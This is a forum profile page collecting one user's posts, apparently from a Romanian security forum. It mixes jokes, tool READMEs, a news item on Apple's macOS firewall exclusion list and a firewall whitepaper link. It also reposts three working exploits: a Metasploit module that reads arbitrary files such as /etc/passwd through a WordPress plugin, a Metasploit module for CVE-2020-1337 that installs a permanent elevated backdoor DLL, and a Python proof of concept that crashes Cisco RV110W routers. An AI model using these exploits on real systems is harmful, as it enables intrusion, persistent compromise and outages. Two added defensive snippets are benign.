Kev
Active Members
Posts: 1026
Joined
Days Won: 55

Everything posted by Kev

  1. Kev

    diviziune

    They are numbers from the Kamasutra; I want to "break" her hypotenuse and leg 2. Thank you all for the replies.
  2. Kev

    diviziune

    Hi, I want to "burn" a teacher; what mathematical formula, as complex as possible, could I put together so that the result is = 73 or = 69? https://www.wolframalpha.com
  3. This Metasploit module exploits an authenticated directory traversal vulnerability in WordPress plugin Simple JobBoard versions prior to 2.9.3 to perform an arbitrary file read with the web server privileges.

     ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Auxiliary
       include Msf::Auxiliary::Report
       include Msf::Exploit::Remote::HTTP::Wordpress
       include Msf::Auxiliary::Scanner

       def initialize(info = {})
         super(update_info(info,
           'Name' => 'Simple JobBoard Authenticated File Read Vulnerability',
           'Description' => %q{
             This module exploits an authenticated directory traversal vulnerability
             in WordPress plugin 'Simple JobBoard' < 2.9.3, allowing arbitrary file
             read with the web server privileges.
           },
           'Author' => [
             'Arcangelo Saracino',        # Vulnerability discovery
             'Hoa Nguyen - Suncsr Team',  # Metasploit module
           ],
           'License' => MSF_LICENSE,
           'References' => [
             ['CVE', '2020-35749'],
             ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'],
             ['URL', 'https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html']
           ],
           'DisclosureDate' => 'Jan 15 2021'))

         register_options([
           OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
           OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
           OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']),
           OptInt.new('DEPTH', [true, 'Traversal depth (to reach the root folder)', 8]),
         ])
       end

       def username
         datastore['USERNAME']
       end

       def password
         datastore['PASSWORD']
       end

       def check
         cookie = wordpress_login(username, password)
         # Without a session the authenticated endpoint cannot be reached
         return CheckCode::Safe if cookie.nil?

         store_valid_credential(user: username, private: password, proof: cookie)
         CheckCode::Appears
       end

       def run_host(ip)
         cookie = wordpress_login(username, password)
         fail_with(Failure::NoAccess, 'Failed to authenticate with the supplied credentials') if cookie.nil?

         traversal = '../' * datastore['DEPTH']
         filename = datastore['FILEPATH']
         # Drop a leading slash so the traversal prefix applies to a relative path
         filename = filename[1, filename.length] if filename =~ /^\//

         res = send_request_cgi({
           'cookie' => cookie,
           'method' => 'GET',
           'uri' => normalize_uri(target_uri.path, 'wp-admin', ''),
           'vars_get' => {
             'post' => 'application_id',
             'action' => 'edit',
             'sjb_file' => "#{traversal}#{filename}"
           }
         })

         fail_with(Failure::Unreachable, 'Connection failed') unless res
         fail_with(Failure::NotVulnerable, 'Connection failed. Nothing was downloaded') if res.code != 200
         fail_with(Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter') if res.body.length.zero?

         print_good('Downloading file ...')
         print_line("\n#{res.body}\n")

         fname = datastore['FILEPATH']
         path = store_loot('Simple_JobBoard.traversal', 'text/plain', ip, res.body, fname)
         print_good("File saved in: #{path}")
       end
     end

     # 0day.today [2021-01-22]
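     An added defensive counterpart (example code, not part of the module above): a resolver that rejects the '../' * DEPTH paths the module builds, plus a check over constructed access-log lines for sjb_file values carrying traversal sequences. UPLOAD_ROOT, the function names and the log lines are assumptions of this example.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlparse

# Assumed base directory for the plugin's uploads; only used to show containment.
UPLOAD_ROOT = "/var/www/html/wp-content/uploads/jobboard"


def resolve_upload(requested, root=UPLOAD_ROOT):
    """Return the absolute path for `requested` if it stays under `root`, else None.

    The vulnerable pattern joins a user-supplied relative path to a base
    directory; any run of '../' then walks out of it unless the resolved
    result is checked against the root afterwards, which is what this does.
    """
    # Decode exactly once, so %2e%2e%2f is treated like ../ while a
    # double-encoded value is not silently decoded a second time.
    candidate = unquote(requested).lstrip("/")
    root_real = os.path.realpath(root)
    # realpath also follows symlinks, so a link inside root pointing outside is caught.
    full = os.path.realpath(os.path.join(root_real, candidate))
    if full != root_real and not full.startswith(root_real + os.sep):
        return None
    return full


# One traversal step in plain, URL-encoded or double-encoded form, either slash.
TRAVERSAL_RE = re.compile(r"(?:\.\.|%2e%2e|%252e%252e)(?:/|\\|%2f|%5c)", re.IGNORECASE)
# Combined-format access log: <ip> - - [<time>] "<method> <target> HTTP/x.y" ...
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def flag_traversal_requests(log_lines):
    """Return (client_ip, decoded sjb_file value) for each request whose
    sjb_file parameter carries a traversal sequence."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qs percent-decodes once; the regex still catches a double-encoded value.
        for value in parse_qs(urlparse(target).query).get("sjb_file", []):
            if TRAVERSAL_RE.search(value):
                hits.append((ip, value))
    return hits


# Constructed sample log lines (not real traffic), shaped like the request the module sends.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jan/2021:10:00:01 +0000] "GET /wp-admin/?post=application_id&action=edit&sjb_file=../../../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.5 - - [22/Jan/2021:10:00:02 +0000] "GET /wp-admin/?post=12&action=edit&sjb_file=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 2990',
    '198.51.100.9 - - [22/Jan/2021:10:00:03 +0000] "GET /wp-admin/?post=12&action=edit&sjb_file=resume-12.pdf HTTP/1.1" 200 55123',
    '198.51.100.9 - - [22/Jan/2021:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    print(resolve_upload("../" * 8 + "etc/passwd"))  # None: escapes the root
    print(resolve_upload("resume-12.pdf"))           # stays under UPLOAD_ROOT
    for ip, value in flag_traversal_requests(SAMPLE_LOG):
        print("traversal attempt from %s: sjb_file=%s" % (ip, value))
```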
  4. Zuccnet

     Zuccnet is a fork of https://github.com/mjkaufer/messer, a command-line client for Facebook Messenger. The only difference is that Facebook can't read your messages.

     It is known that Facebook scans your messages. If you need to keep using Facebook Messenger but care about privacy, Zuccnet might help.

     It's pretty simple: you and your friend have Zuccnet installed. Your friend gives you their Zuccnet public key. Then, when you send a message to your friend on Zuccnet, your message is encrypted on your machine before it is sent across Facebook to your friend. Then, your friend's Zuccnet decrypts the message. Facebook never sees the content of your message.

     I'm not a security person and there's probably some stuff I've missed - any contributions are very welcome! This is very beta, don't take it too seriously.

     Quick Start

     Node version 12.x required.

     1. Install zuccnet
        $ npm install -g zuccnet
     2. Run zuccnet
        $ zuccnet
     3. Enter your login details (your username and password are not stored)
     4. Get your friend's public key, and assign it to them in Zuccnet
        $ public_key "John Smith" /Users/tomquirk/Downloads/johns_id_rsa.pub
     5. Send them a message
        $ message "John Smith" Hey John, this is a super secret message
     6. 🪄

     FAQ

     Do you store any of my data?
     We don't store your username, password, or any of your interactions on Zuccnet. The only thing we store is a temporary login token when you first log in. This lets us authenticate you with Facebook without you having to enter your username and password every time. If you want to get rid of it, simply run zuccnet cleanup, or if you're in a Zuccnet session, run the logout command.

     Can I use a deactivated Facebook account?
     No, unfortunately not. If you use Zuccnet with a deactivated Facebook account, your account will be reactivated.

     How do group chats work?
     Messages from group chats appear like
        (My cool friends) John Smith - hey guys!!$$@@
     Send a message to a group by using the message command. The name is the name of the group chat! Reply works as normal.

     Commands Reference

     message
     Sends a message to a given user.
        (message | m) "<user>" <message>
     Examples
        message "Matthew" hello world!
        m "Matthew" hello world!
     When sending a message, Zuccnet picks the closest match to what you type in as user. For this reason, you should probably use last names if you want to avoid accidentally texting someone.

     reply
     Replies to the last message you received, i.e. sends a message to the user of the most recently received message.
        (reply | r) <message>
     Example
        r "hey yo this is my reply"
     Note: this will only work if you have received at least one message through Zuccnet.

     contacts
     Lists all of your Facebook friends.
        contacts

     history
     Displays the last n messages in the conversation with a given user. The number of messages to retrieve is optional (default is 5).
        (history | h) "<user>" [<n>]
     Examples
        history "Matthew" 10
        h "Matthew"

     recent
     Displays the n most recent conversations. The number of threads is optional (default is 5). The --history option will display the 5 most recent messages in each thread.
        recent [<n>] [--history]
     Examples
        recent
        recent 10
        recent --history

     clear
     Clears the number of unread messages in the window title. Since we cannot listen on focus events, it has to be done manually.
        (clear | c)

     logout
     Logs you out.
        logout

     mute
     Mutes a thread. If no seconds are specified, the thread is muted indefinitely.
        mute "<thread-name>" [seconds]

     unmute
     Unmutes a thread.
        unmute "<thread-name>"

     settings
     Configure your user settings on Zuccnet.
        settings (set | get | list) [<key>=<value>]
     Examples
        settings list
        settings get SHOW_READ
        settings set SHOW_READ=true
     For supported settings, see the section below.

     Supported Settings
       • SHOW_READ: marks a conversation as "read" when using the clear command

     Lock-on Mode
     Locking on to a user or group allows you to send messages without having to specify the message command; just type away!
        lock "Tom Q"
     To unlock, simply run:
        --unlock

     Secret Mode
     When in this mode, any messages sent or received in the thread will be deleted for you (note, they won't be deleted for everyone).
        lock "Tom Q" --secret

     Non-interactive Mode
     Zuccnet can be run in non-interactive mode with command line arguments to execute a single command.
        zuccnet --command='<command>'
     Login will be prompted if this is the first time logging in.
     Examples
        zuccnet --command='m "John Smith" Hey, John'
        zuccnet --command='r Hey, John'

     Cleanup
     If ever you want to clean up any old Zuccnet sessions and start from scratch, run:
        $ zuccnet cleanup

     Contributing
     Want to add a new command, fix a bug or improve Zuccnet in another way? Please read CONTRIBUTING.md for details on our code of conduct, and the process for submitting pull requests to us.

     License
     This project is licensed under the ISC License - see the LICENSE file for details.

     Download zuccnet-master.zip or git clone https://github.com/tomquirk/zuccnet.git
  5. Kev

    FaceCompare

    FaceCompare is a simple app for finding similar photos. It will help you find duplicates of your photos by face alone, no matter how much they have been changed.

    Download (only for macOS 10.15 and higher)
  6. Color attribute https://playfairdata.com/3-ways-make-handsome-highlight-tables-tableau/
  7. This exploit leverages a file write vulnerability in the print spooler service which will restart if stopped. Because the service cannot be stopped long enough to remove the dll, there is no way to remove the dll once it is loaded by the service. Essentially, on default settings, this module adds a permanent elevated backdoor.

     ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core/post/windows/powershell'

     class MetasploitModule < Msf::Exploit::Local
       Rank = ExcellentRanking

       include Msf::Post::Common
       include Msf::Post::File
       include Msf::Post::Windows::Priv
       include Msf::Exploit::EXE
       include Msf::Post::Windows::Powershell
       prepend Msf::Exploit::Remote::AutoCheck

       def initialize(info = {})
         super(
           update_info(
             info,
             'Name' => 'Microsoft Spooler Local Privilege Elevation Vulnerability',
             'Description' => %q{
               This exploit leverages a file write vulnerability in the print spooler
               service which will restart if stopped. Because the service cannot be
               stopped long enough to remove the dll, there is no way to remove the
               dll once it is loaded by the service. Essentially, on default settings,
               this module adds a permanent elevated backdoor.
             },
             'License' => MSF_LICENSE,
             'Author' => [
               'Peleg Hadar',  # Original discovery
               'Tomer Bar',    # Original discovery
               '404death',     # PoC
               'sailay1996',   # PoC
               'bwatters-r7'   # msf module
             ],
             'Platform' => ['win'],
             'SessionTypes' => ['meterpreter'],
             'Targets' => [
               [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
             ],
             'DefaultTarget' => 0,
             'DisclosureDate' => '2019-11-04',
             'References' => [
               ['CVE', '2020-1337'],
               ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337'],
               ['URL', 'https://github.com/sailay1996/cve-2020-1337-poc'],
               ['URL', 'https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/']
             ],
             'DefaultOptions' => { 'DisablePayloadHandler' => true },
             'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
           )
         )

         register_options([
           OptString.new('JUNCTION_PATH', [false, 'Path to use as junction (%TEMP%/%RAND% by default).', nil]),
           OptString.new('DESTINATION_PATH', [false, 'Location of file to overwrite (%WINDIR%\system32\ by default).', nil]),
           OptString.new('DESTINATION_FILE', [false, 'Filename to overwrite (ualapi.dll by default).', nil]),
           OptString.new('PRINTER_NAME', [true, 'Printer Name to use (%RAND% by default).', Rex::Text.rand_text_alpha(5..9).to_s]),
           OptBool.new('RESTART_TARGET', [false, 'Restart the target after exploit (you will lose your session until a second reboot).', false])
         ])
       end

       def cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, b64_payload)
         # Read in Generic Script
         script = exploit_data('CVE-2020-1337', 'cve-2020-1337.ps1')
         fail_with(Failure::BadConfig, 'No exploit script found') if script.nil?

         # Replace Values in Generic Script
         vprint_status('Replacing variables')
         junction_filepath = "#{junction_path}\\#{destination_file}"
         # The random string appears to be required when using the psh_exec
         # It may be due to the way we break apart the script?
         # I would not be upset to find the root cause and fix it.
         script.gsub!('JUNCTION_FILEPATH', junction_filepath)
         script.gsub!('PRINTER_NAME', printer_name)
         script.gsub!('JUNCTION_PATH', junction_path)
         script.gsub!('DESTINATION_PATH', destination_path)
         script.gsub!('B64_PAYLOAD_DLL', b64_payload)

         # Run Exploit Script
         print_status("Running Exploit on #{sysinfo['Computer']}")
         begin
           # client.powershell.execute_string(code: script)
           session.powershell.execute_string({ code: script })
         rescue Rex::TimeoutError => e
           elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
           print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
         end
       end

       def exploit
         if datastore['DESTINATION_PATH'].nil? || datastore['DESTINATION_PATH'].empty?
           win_dir = session.sys.config.getenv('windir')
           destination_path = "#{win_dir}\\system32"
         else
           destination_path = datastore['DESTINATION_PATH']
         end

         if datastore['DESTINATION_FILE'].nil? || datastore['DESTINATION_FILE'].empty?
           destination_file = 'ualapi.dll'
         else
           destination_file = datastore['DESTINATION_FILE']
         end

         if datastore['JUNCTION_PATH'].nil? || datastore['JUNCTION_PATH'].empty?
           junction_path = "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(6..15)}"
         else
           junction_path = datastore['JUNCTION_PATH']
         end

         client.core.use('powershell') unless client.ext.aliases.include?('powershell')

         printer_name = datastore['PRINTER_NAME']
         payload_dll = generate_payload_dll

         # Check target
         vprint_status('Checking Target')
         validate_active_host
         validate_payload

         # Run the exploit
         cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, Rex::Text.encode_base64(payload_dll))
         sleep(3) # make sure exploit is finished

         # Reboot, if desired
         if datastore['RESTART_TARGET']
           sleep(10)
           vprint_status("Rebooting #{sysinfo['Computer']}")
           begin
             session.sys.power.reboot
           rescue Rex::TimeoutError => e
             elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
             print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
           end
         end
       end

       def validate_active_host
         print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
       rescue Rex::Post::Meterpreter::RequestError => e
         elog('Could not connect to session', error: e)
         raise Msf::Exploit::Failed, 'Could not connect to session'
       end

       def validate_payload
         vprint_status("Target Arch = #{sysinfo['Architecture']}")
         vprint_status("Payload Arch = #{payload.arch.first}")
         unless payload.arch.first == sysinfo['Architecture']
           fail_with(Failure::BadConfig, 'Payload arch must match target arch')
         end
       end

       def check
         sysinfo_value = sysinfo['OS']
         # The whole match is the build number, e.g. 18362 in "Windows 10 (10.0 Build 18362)"
         build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
         vprint_status("Build Number = #{build_num}")
         return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363

         Exploit::CheckCode::Safe
       end
     end

     # 0day.today [2021-01-19]
  8. Double Patterns, in case he isn't a cheat and can't do a flash.
  9. Whitepaper called UFW - A Beginners Guide to Linux Firewall. The white paper is intended to provide information about a Linux firewall using a simple tool called UFW. It provides complete information on the tool and various ways through which users can create their own firewall rules to protect their assets.

     Download
        wget https://packetstormsecurity.com/files/download/160970/ufw-beginnersguide.pdf
  10. Kev

    COVID-19

    //
  11. Kev

    COVID-19

    Why a vaccine and not an antidote?
  12. Cisco RV110W version 1.2.1.7 vpn_account denial of service proof of concept exploit.

     # Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)
     # Exploit Author: Shizhi He
     # Vendor Homepage: https://www.cisco.com/
     # Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7
     # Version: V1.2.1.7
     # Tested on: RV110W V1.2.1.7
     # CVE : CVE-2021-1167
     # References:
     # https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md
     # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U

     #!/usr/bin/env python2
     #####
     ## Cisco RV110W Remote Stack Overflow.
     ### Tested on version: V1.2.1.7 (maybe useable on other products and versions)

     import sys
     import re
     import urllib
     import urllib2
     import hashlib
     import ssl

     ssl._create_default_https_context = ssl._create_unverified_context

     ###
     # Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco
     # This PoC will crash the target HTTP/HTTPS service
     ###

     # encrypt password: the web UI appends the two-digit password length,
     # repeats the result to 64 characters and hashes it with MD5
     def enc(s):
         l = len(s)
         s += "%02d" % l
         mod = l + 2
         ans = ""
         for i in range(64):
             tmp = i % mod
             ans += s[tmp]
         return hashlib.md5(ans).hexdigest()


     if __name__ == "__main__":
         if len(sys.argv) != 5:
             print "Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco"
             sys.exit(1)
         IP = sys.argv[1]
         PORT = sys.argv[2]
         USERNAME = sys.argv[3]
         PASSWORD = enc(sys.argv[4])
         url = 'https://' + IP + ':' + PORT + '/'

         # get session_id by POST login.cgi
         req = urllib2.Request(url + "login.cgi")
         req.add_header('Origin', url)
         req.add_header('Upgrade-Insecure-Requests', 1)
         req.add_header('Content-Type', 'application/x-www-form-urlencoded')
         req.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
         req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
         req.add_header('Referer', url)
         req.add_header('Accept-Encoding', 'gzip, deflate')
         req.add_header('Accept-Language', 'en-US,en;q=0.9')
         req.add_header('Cookie', 'SessionID=')
         data = {
             "submit_button": "login",
             "submit_type": "",
             "gui_action": "",
             "wait_time": "0",
             "change_action": "",
             "enc": "1",
             "user": USERNAME,
             "pwd": PASSWORD,
             "sel_lang": "EN"
         }
         r = urllib2.urlopen(req, urllib.urlencode(data))
         resp = r.read()
         login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
         session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
         print session_id

         # trigger stack overflow through POST vpn_account parameter and cause denial of service
         req2 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
         req2.add_header('Origin', url)
         req2.add_header('Upgrade-Insecure-Requests', 1)
         req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
         req2.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
         req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
         req2.add_header('Referer', url)
         req2.add_header('Accept-Encoding', 'gzip, deflate')
         req2.add_header('Accept-Language', 'en-US,en;q=0.9')
         req2.add_header('Cookie', 'SessionID=')
         poc = "a" * 4096
         data_cmd = {
             "gui_action": "Apply",
             "submit_type": "",
             "submit_button": "vpn_client",
             "change_action": "",
             "pptpd_enable": "0",
             "pptpd_localip": "10.0.0.1",
             "pptpd_remoteip": "10.0.0.10-14",
             "pptpd_account": "",
             "vpn_pptpd_account": "1",
             "vpn_account": poc,
             "change_lan_ip": "0",
             "netbios_enable": "0",
             "mppe_disable": "0",
             "importvpnclient": "",
             "browser": "",
             "webpage_end": "1",
         }
         r = urllib2.urlopen(req2, urllib.urlencode(data_cmd))
         resp = r.read()
         print resp

     # 0day.today [2021-01-15]
  13. The ContentFilterExclusionList has been removed in macOS 11.2 beta 2.

     Apple has removed a controversial feature from the macOS operating system that allowed 53 of Apple's own apps to bypass third-party firewalls, security tools, and VPN apps installed by users for their protection.

     Known as the ContentFilterExclusionList, the list was included in macOS 11, also known as Big Sur. The exclusion list included some of Apple's biggest apps, like the App Store, Maps, and iCloud, and was physically located on disk at:
        /System/Library/Frameworks/NetworkExtension.framework/Versions/Current/Resources/Info.plist

     Its presence was discovered last October by several security researchers and app makers who realized that their security tools weren't able to filter or inspect traffic for some of Apple's applications.

     Security researchers such as Patrick Wardle, and others, were quick to point out at the time that this exclusion list was a security nightmare waiting to happen. They argued that malware could latch on to legitimate Apple apps included on the list and then bypass firewalls and security software.

     Besides security pros, the exclusion list was widely panned by privacy experts as well, since macOS users also risked exposing their real IP address and location when using Apple apps, as VPN products wouldn't be able to mask users' location.

     APPLE SAID IT WAS TEMPORARY

     Contacted for comment at the time, Apple told ZDNet the list was temporary but did not provide any details. An Apple software engineer later told ZDNet the list was the result of a series of bugs in Apple apps, rather than anything nefarious from the Cupertino-based company. The bugs were related to Apple deprecating network kernel extensions (NKEs) in Big Sur and introducing a new system called Network Extension Framework, and Apple engineers not having enough time to iron out all the bugs before the Big Sur launch last fall.

     But some of these bugs have been slowly fixed in the meantime, and, yesterday, with the release of macOS Big Sur 11.2 beta 2, Apple felt it was safe to remove the ContentFilterExclusionList from the OS code (as spotted by Wardle earlier today). Once Big Sur 11.2 is released, all Apple apps will once again be subject to firewalls and security tools, and they'll be compatible with VPN apps.

     Via zdnet.com
  14. Maybe something like this helps you too: https://www.emag.ro/stabilizator-automat-de-tensiune-cu-servo-motor-1000va-well-avr-srv-constant1000-wl/pd/D5MMZWBBM/
  15. Send me a PM with some keywords.
  16. Kev

    infrabot

    infrabot.io - easily control your infrastructure with a Telegram bot. infrabot is a system service which allows you to create your own commandlets to control your infrastructure using a Telegram Bot.

    Documentation
    Get started with infrabot, learn how to configure infrabot for your organization (config.json) and with the Infrabot UI Configurator.
      • Getting Started
      • Configure Bot
      • Config file Overview
      • GUI Tool
      • Infrabot Service
      • Demo Setup

    Prerequisites
    Install .NET Core 5.0.0

    Download infrabot-main.zip or https://github.com/infrabot-io/infrabot.git
  17. GKE Auditor

     A tool to detect a set of common Google Kubernetes Engine misconfigurations. Aimed to help security and development teams streamline configuration parts of their processes, and save time looking for generic bugs and vulnerabilities. The tool consists of individual modules called Detectors, each scanning for a specific vulnerability.

     This is not an officially supported Google product.

     Dependencies
       • JDK 11 or later
       • Maven
       • Google Cloud SDK
       • kubectl

     To install the dependencies on Debian, run:
        install-debian.sh

     If the tool is run from a GCP Cloud Shell, all the above mentioned dependencies should be pre-installed in the Shell. To access the Cloud Shell, use the Google Cloud Console or SSH into it by running:
        gcloud alpha cloud-shell ssh
     after installing the Google Cloud SDK on your local machine.

     Installation
        git clone https://github.com/google/gke-auditor
        cd ./gke-auditor/
        ./build.sh

     Authentication
     Before running the tool, make sure to configure access to your cluster.
        gcloud init
        gcloud auth login
        gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE

     Usage
     The tool has to be built by running the build.sh script first. Once the tool is built, it can be run using the auditor.sh script, using the following options:
        ./auditor.sh [-a] [-ast] [-c] [-d] [-h] [-i <arg>] [-p <arg>] [-q] [-r <arg>]

        -a,--all          Run all detectors.
        -ast,--assets     Run all detectors for each individual asset.
        -c,--color        Turns on tool output coloring.
        -d,--defaults     Runs detectors including Kubernetes default assets. Disabled by default.
        -h,--help         Print help information.
        -i,--iso <arg>    Run Node Isolation detectors. To run all detectors, omit the argument list. To specify individual detectors to run, give a list of indices:
                            1. NODE_SELECTOR_POD_REJECTED
                            2. NODE_TAINTS_POD_REJECTED
                            3. NODE_AFFINITY_POD_REJECTED
        -p,--psp <arg>    Run PSP (Pod Security Policy) detectors. To run all detectors, omit the argument list. To specify individual detectors to run, give a list of indices:
                            1. PRIVILEGED_CONTAINERS
                            2. CONTAINERS_SHARING_HOST_PROCESS_ID_NAMESPACE
                            3. CONTAINERS_SHARING_HOST_IPC
                            4. CONTAINER_SHARING_HOST_NETWORK_NAMESPACE
                            5. CONTAINERS_ALLOW_PRIVILEGE_ESCALATION
                            6. ROOT_CONTAINERS_ADMISSION
                            7. CONTAINERS_NET_RAW_CAPABILITY
                            8. CONTAINERS_ADDED_CAPABILITIES
                            9. CONTAINERS_CAPABILITIES_ASSIGNED
        -q,--quiet        Prints out only misconfigurations, without additional detector info. Disabled by default.
        -r,--rbac <arg>   Run RBAC (Role Based Access Control) detectors. To run all detectors, omit the argument list. To specify individual detectors to run, give a list of indices:
                            1. CLUSTER_ADMIN_ROLE_USED
                            2. SECRET_ACCESS_ALLOWED
                            3. WILDCARD_USED
                            4. CREATE_PODS_ALLOWED
                            5. AUTOMOUNT_SERVICE_ACCOUNT_TOKEN_ENABLED
                            6. ESCALATING_RESOURCES_REPORT

     Examples

     Run all detectors
        ./auditor.sh
     or
        ./auditor.sh --all

     Run specific detectors
        ./auditor.sh --iso 1 --psp 2,3 --rbac
     This will run the first isolation detector (NODE_SELECTOR_POD_REJECTED), the second and third PSP detectors (CONTAINERS_SHARING_HOST_PROCESS_ID_NAMESPACE, CONTAINERS_SHARING_HOST_IPC) and all RBAC detectors. Detectors can be chosen by specifying a list of indices in accordance with the lists given in the help section of the tool.

     Run detectors for individual assets
        ./auditor.sh --assets                            # Runs all detectors.
        ./auditor.sh --assets --iso 0 --psp 1,2 --rbac   # Runs only specified detectors.
     A detector auditing assets for vulnerabilities individually: instead of running a detector on all available assets, runs all detectors on a single asset at a time.

     Additional features
     In addition to the examples listed above, the tool can be run with the following options:

     Coloring
        ./auditor.sh -c
     Vulnerabilities will be colored in red.

     Quiet mode
        ./auditor.sh -q
     Quiet mode: no additional information about vulnerabilities will be printed out besides the detector names and vulnerable assets found.

     Including K8s defaults
        ./auditor.sh -d
     Includes K8s defaults in the audit. A default K8s cluster will have some configurations which might be considered vulnerable by the tool. Those configurations are excluded from the audit by default, but including those defaults might be useful for some researchers (e.g. those auditing K8s itself).

     Detector Information
     For detailed information about the vulnerabilities the detectors are checking for, refer to OUTPUTS.md.

     References
     Some of the implemented detectors refer to CIS Benchmarks.

     Contributing
     See CONTRIBUTING.md.

     License
     Copyright 2020 Google LLC

     Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0

     Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

     Download gke-auditor-master.zip or git clone https://github.com/google/gke-auditor.git
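     An added example, not gke-auditor's own code: a Python version of the PSP checks and the automount check named in the detector lists above, run over a constructed Pod manifest instead of a live cluster. The audit_pod function, its default handling and the sample manifest are assumptions of this example.

```python
import json

# Constructed sample Pod manifest (not from a real cluster), embedded so the
# example runs offline without kubectl.
SAMPLE_POD = json.loads("""
{
  "kind": "Pod",
  "metadata": {"name": "debug-shell", "namespace": "default"},
  "spec": {
    "hostPID": true,
    "hostNetwork": true,
    "containers": [
      {"name": "shell", "image": "busybox",
       "securityContext": {"privileged": true,
                           "capabilities": {"add": ["NET_RAW", "SYS_ADMIN"]}}},
      {"name": "sidecar", "image": "busybox",
       "securityContext": {"runAsNonRoot": true,
                           "allowPrivilegeEscalation": false,
                           "capabilities": {"drop": ["ALL"]}}}
    ]
  }
}
""")


def audit_pod(pod):
    """Return sorted (detector, subject) findings for one Pod, using the
    detector names gke-auditor lists for its PSP and automount checks."""
    findings = []
    spec = pod.get("spec", {})
    pod_name = pod.get("metadata", {}).get("name", "<unnamed>")

    # Pod-level flags: every container in the pod shares the host namespace.
    if spec.get("hostPID"):
        findings.append(("CONTAINERS_SHARING_HOST_PROCESS_ID_NAMESPACE", pod_name))
    if spec.get("hostIPC"):
        findings.append(("CONTAINERS_SHARING_HOST_IPC", pod_name))
    if spec.get("hostNetwork"):
        findings.append(("CONTAINER_SHARING_HOST_NETWORK_NAMESPACE", pod_name))
    # Kubernetes mounts the service-account token unless explicitly disabled.
    if spec.get("automountServiceAccountToken", True):
        findings.append(("AUTOMOUNT_SERVICE_ACCOUNT_TOKEN_ENABLED", pod_name))

    pod_sc = spec.get("securityContext", {})
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        cname = c.get("name", "<unnamed>")
        sc = c.get("securityContext", {})
        caps = sc.get("capabilities", {})
        added = set(caps.get("add", []))
        dropped = set(caps.get("drop", []))

        if sc.get("privileged"):
            findings.append(("PRIVILEGED_CONTAINERS", cname))
        # allowPrivilegeEscalation defaults to true, so only an explicit false passes.
        if sc.get("allowPrivilegeEscalation", True):
            findings.append(("CONTAINERS_ALLOW_PRIVILEGE_ESCALATION", cname))
        # runAsNonRoot can be set on the pod or the container; the container wins.
        if not sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot", False)):
            findings.append(("ROOT_CONTAINERS_ADMISSION", cname))
        # NET_RAW is in the default capability set, so it is present unless dropped.
        if "NET_RAW" in added or not ({"NET_RAW", "ALL"} & dropped):
            findings.append(("CONTAINERS_NET_RAW_CAPABILITY", cname))
        if added:
            findings.append(("CONTAINERS_ADDED_CAPABILITIES", cname))
    return sorted(findings)


if __name__ == "__main__":
    for detector, subject in audit_pod(SAMPLE_POD):
        print("%-45s %s" % (detector, subject))
```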
  18. It has been spreading via USB stick for a long time. I haven't read the whole article.
  19. ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

